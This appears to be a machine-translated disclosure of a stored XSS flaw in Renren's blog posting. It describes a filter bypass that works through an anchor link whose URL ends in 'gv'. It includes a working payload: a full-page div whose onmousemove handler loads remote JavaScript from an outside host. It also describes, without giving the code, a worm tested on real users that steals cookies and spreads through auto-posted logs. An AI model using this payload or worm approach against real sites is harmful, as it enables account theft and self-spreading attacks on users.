Renren log storage XSS bypass Filter

The log storage XSS of the personal network can load external JS, get Cookies, and automatically send logs to spread XSS code. Worms are tested in a small scale. The damage is serious.

When a log is published, HTML code is directly edited through the Chrome review element, or HTML data can be published through the burpsuite package modification. However, it was found that the filtering was strict, and a large number of testing samples were used to test the black box and the side leakage was found. After a long period of filtering, I found a place that bypasses the filter. It was very strange. So far, we are still very depressed about the mechanism of everyone's filters.

 

Add the XSS test code
<A href = "http: // www.2cto.com/gv"> & nbsp; </a>

The tag XSS filter is completely invalid. The following gv is required and can contain characters in the middle. For example, g _ v g... v may be determined by regular expression extraction. The black box test result is used... I don't know the truth. It's depressing.

For example:
The following code is filtered out:
<Script> alert (/xss/); </script>

 

The following code bypasses the filter:
<Script> alert (/xss/); </script>
<A href = "http://www.test.com/gv"> & nbsp; </a>

Is it amazing?

However, if the script tag is directly added, the data in the script tag will be commented out.

 

Therefore, the onerror event of img is found to have been filtered out, indicating that there are also filtered at this layer.

Added a DIV to set the length to 100%. The onmousemove action is used to trigger XSS.

The Code is as follows:
<Div style = "height: 100%; width: 100%; z-index: 10; position: absolute; left: 0px; top: 0px;" id = "Nietzsche"
Onmousemove = "var script = document. createElement ('script'); SCRIPT. setAttribute ('type', 'text/javascript '); script. setAttribute ('src', 'HTTP: // xxxxxx.com/xss-test/renren/test.js'); document. getElementsByTagName ('head') [0]. appendChild (script); ">
<A href = "http://www.test.com/gv"> & nbsp; </a>
</Div>

 

You can do whatever you want .. For example, sister paper information or something ..

Later, I studied the log delivery function with @ Drizzle. Risk. When sending logs, I need to verify the token and obtain the token first. Then @ Drizzle. Risk wrote a worm. In wooyun, I was afraid that someone had published a worm for everyone and deleted the account. Then we can perform a small test. You can automatically send logs to spread XSS code and Mark logs as your favorite.

JS Code is not sent.

The window size is the same.

 

Test the Worm
You only need to put an image.
Click it. You can automatically like this log and post new XSS logs.





 

Finally, send a benefit .. Paste a large image

 

Solution:
The filter rules seem a bit problematic. Let's take a look at it ..